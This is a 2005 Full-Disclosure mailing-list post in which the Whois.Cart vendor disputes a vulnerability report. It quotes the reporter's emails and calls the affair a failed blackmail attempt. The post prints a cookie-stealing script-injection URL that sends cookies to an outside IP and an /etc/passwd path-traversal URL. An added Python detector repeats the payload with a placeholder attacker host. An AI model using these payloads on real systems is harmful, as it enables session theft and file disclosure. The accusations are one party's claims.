
Re: [Full-disclosure] Multiple Vulnerabilities in Saeven.net's WhoisCart software.



It's unfortunate that a community whose posts are meant to be useful becomes 
littered with individuals who resort to abasement and personal insults. It's 
convenient however that only the last few bits of a conversation between myself 
and Elzar (aka Vic Fryzel) figure as the basis and closing statement of the 
vulnerability report to which this reply is intended:

http://lists.grok.org.uk/pipermail/full-disclosure/2005-June/034690.html

To clarify the situation, since we're on open grounds here, I'll post the 
pertinent emails.  This is what I get in my inbox at the end of a normal day:

Email #1
_______
Hello.

My name is Vic Fryzel, and I am a private security consultant. Recently, I have 
found a major vulnerability in your WhoisCart software that allows for 
unauthorized client and administrative logins. I'm mailing in hopes of 
privately disclosing this vulnerability to you. My services come with a fee of 
$500 USD per vulnerability, with half of that fee paid up front, and the other 
half paid upon delivery of the vulnerability. Delivery of the vulnerability will 
come in a detailed report, stating how to reproduce the vulnerability, why the 
vulnerability occurs, and how to fix the vulnerability. The second half of the 
payment should come upon your successful reproduction of the vulnerability, 
which in this case should not be at all hard.

Thank you for your time.
Warm regards,
Vic Fryzel
vic@xxxxxxxxxxxxx


Response #1 (from myself)
____________________
This message is definitely difficult to digest as its contents come unfounded.  
Unfortunately we cannot honor it as is, since you provide no basis, or proof 
for what you suggest.  Further, the grounds on which you present this 
opportunistic proposal are legally unsound; whilst not interested in pursuing 
legalities however, I'll extend you a chance to first prove your claim without 
initially disclosing the substance of what you suggest.  If proven, we can 
discuss a contractual agreement, where we could also discuss your fee for the 
consultancy; and viability of contract.  Signed and agreed, we'll gladly 
exchange your fee for the solution to the problem you suggest exists.

    I've installed a whois.cart for you at:
    (url removed)

    My request is that you give me the particulars of the first hosting account 
listed in the hosts section.  If you can give me these details within 12 hours, 
I will gladly entertain your proposal, and continue discussion with you as 
applicable to your initial proposal, and the aforementioned engagements.

____________________

After this point the dodgy conversations continued after I'd made a test 
environment fully available to Vic.  Vic couldn't make good on his initial 
claim, and never was able to reveal a single thing.  He later admits:


Vic Fryzel aka Elzar Stuffenbach : 6/20/2005 11:05 PM:
"Hey, Ah; I'm pretty sure that last night I was able to duplicate this
vulnerability in more places, but I'll take your word for it. Regardless, I
was "wrong" in my initial findings. However, I have a new finding, and I
don't have SSH access to your test server. I can prove it to you, come up
with a test environment for proof."


The falsified claims and unfounded "new vulnerabilities"  (new attempts at a 
quick $500?) continue for another 3-4 emails, something here, there (in a 
Seussian dizziness) and in closure to a string of resultless attempts Vic 
attempts anew:

Vic Fryzel aka Elzar Stuffenbach : 6/22/2005 11:05 PM:
"Hey Alexandre, so, I've been able to actually recreate the first vulnerability 
(javascript), under a different scenario on your test setup. Let me know how 
you'd like to proceed. Vic"

Still however, the hosting item in the admin list was never yet revealed! It 
was obvious then, that Vic couldn't make good on his claim - what credibility 
is then left?  None.  Blackmail attempts aren't all that new to any software 
company.  We'll of course dismiss the affair, and thank him for his efforts.  
Elzar concluded instead with an email which resorted to insults, to which I 
replied a message which was only conveniently partially copied in his post here 
- I'll paste it in its entirety here - seems he left out the part that clearly 
stated his efforts had failed:

____________________
I'll indulge your comments.

    The truth is that I don't maintain the work on whois.cart currently. I have 
a staff of 13 people working for me right now, the developments are intense and 
I don't have the time to monitor them as I usually would.  They package and 
operate independently from myself.  My user community knows well (as I post 
frequent updates in the forums) that I'm currently invested in
our other project, our helpdesk.  We have a user base of 3000+, you aren't the 
only one to submit bug reports - note also that the people that work for me 
aren't bored teenagers.  They are people with M.Scs and PhDs in computer 
science and related fields, who've agreed to partake in the whois.cart project 
in their spare time initially.  Your concern for security is not
exclusive.

    Calling me a liar doesn't change the fact that Sunday's claim, still 
unfounded, has you upset at me just today for some completely unrelated and 
absurd reason.  Admit that from my point of view, this is absolutely 
outlandish.  More than 48 hours have passed during which you could have 
substantiated your claim.

    I'll leave the testbed running 2.2.80 until Friday as promised.  Again, if 
you can make good on your initial claim, I'll honor it to all ends even though 
your propositions are increasingly shady, and that you've resorted to insults 
and abasement in the process.  We're people of our word, and I'll hold to that - 
whatever your motives are.  Tact goes a longer way though, we generously reward 
people in our user community that do genuinely find what you had claimed to 
have found.
____________________

Never a peep past this. What is interesting though, is that instead of posting 
REAL links to the cart in his report - we get fictitious links - why not try it 
for yourselves?

http://yourdomain.com/whoiscart/profile.php?page=INSERT_JAVASCRIPT_HERE

becomes

http://whoiscart.net/demo/profile.php?page=%3Cbody+onload%3Ddocument.forms%5B0%5D.submit%28document.cookie%29%3E%3Cform+name%3Dform1+action%3Dhttp%3A%2F%2F12.202.41.221%2F%7Evic%2Ftest.php%3E%3C%2Fform%3E%3C%2Fbody%3E

Further, the file-browse fabrication would work like this:

http://whoiscart.net/demo/index.php?language=../../../../../../../../../../../../../etc/passwd%00

Lastly, as reply to the "Workaround" paragraph, Elzar brings up completely 
unrelated material into something that has nothing to do with Whois.Cart!  
What's worse, is Vic's own website, no links work, script errors appear left 
and right - these things are taken into consideration when such a claim is 
made.  In the end, the claim followed his site's suit.  Unfounded, and 
unfinished.

From: Vic Fryzel <vic@xxxxxxxxxxxxx>
http://shellsage.com


This said, damage control has that unfortunately this individual's failed 
attempt at blackmail has resulted in a rather rapid propagation of these 
repeated falsifications all over vulnerability and
security report sites.  If you operate such a site and read this, I would 
appreciate if you remove this resource.  Do feel free to contact us first hand, 
myself personally at [saeven at saeven dot net] if you require any type of 
tangible testing or proof; I'll gladly give you access to the same test 
environment that Vic/Elzar was given.  All sites that we've contacted in 
conjunction with their reports based on this email have removed it immediately, 
aside from Secunia which have yet to act.  

Our product, and foremost, our users are of utmost importance, and we cannot 
have their peace of mind polluted with someone's retort to a botched blackmail 
attempt.

Cordially.
Alexandre
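Whatever the merits of the dispute above, the two URLs quoted in the post (the `profile.php?page=` HTML injection and the `index.php?language=../../etc/passwd%00` traversal with a null byte) are the patterns a site operator would want to flag in web logs and to neutralise at the input layer. The following is an added example, not code from the post or from Whois.Cart: it decodes request query strings, classifies each parameter, and shows an allowlist for `language` and output encoding for `page`. The language codes and the `attacker.example` host are assumptions.

```python
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample request lines modelled on the URLs in the post
# (the exfiltration host is replaced with a placeholder).
SAMPLE_REQUESTS = [
    "/demo/profile.php?page=%3Cbody+onload%3Ddocument.forms%5B0%5D.submit"
    "%28document.cookie%29%3E%3Cform+name%3Dform1+action%3Dhttp%3A%2F%2F"
    "attacker.example%2Ftest.php%3E%3C%2Fform%3E%3C%2Fbody%3E",
    "/demo/index.php?language=../../../../../../../../../../etc/passwd%00",
    "/demo/index.php?language=en",
    "/demo/profile.php?page=account",
]

ALLOWED_LANGUAGES = {"en", "fr", "de"}  # assumed allowlist of language codes
TAG_RE = re.compile(r"<\s*/?\s*[a-z][a-z0-9]*", re.I)   # start of an HTML tag
DOTDOT_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")        # a ".." path segment


def decode_param(raw: str) -> str:
    """Percent-decode until the value is stable so double encoding cannot hide a payload."""
    prev = None
    while prev != raw:
        prev, raw = raw, unquote(raw)
    return raw


def classify_request(request_line: str) -> list:
    """Return (parameter, finding) pairs for every suspicious query parameter."""
    query = urlsplit(request_line).query
    findings = []
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            decoded = decode_param(value)
            if "\x00" in decoded:
                findings.append((name, "null-byte"))
            if DOTDOT_RE.search(decoded):
                findings.append((name, "path-traversal"))
            if TAG_RE.search(decoded):
                findings.append((name, "html-injection"))
    return findings


def safe_language(raw: str, default: str = "en") -> str:
    """Allowlist the language code; an unknown value falls back to the default, never to a path."""
    decoded = decode_param(raw)
    return decoded if decoded in ALLOWED_LANGUAGES else default


def safe_page_text(raw: str) -> str:
    """Output-encode a page parameter before it is echoed into HTML."""
    return html.escape(decode_param(raw), quote=True)
```

Running `classify_request` over `SAMPLE_REQUESTS` flags the first two lines and leaves the benign ones untouched.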
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/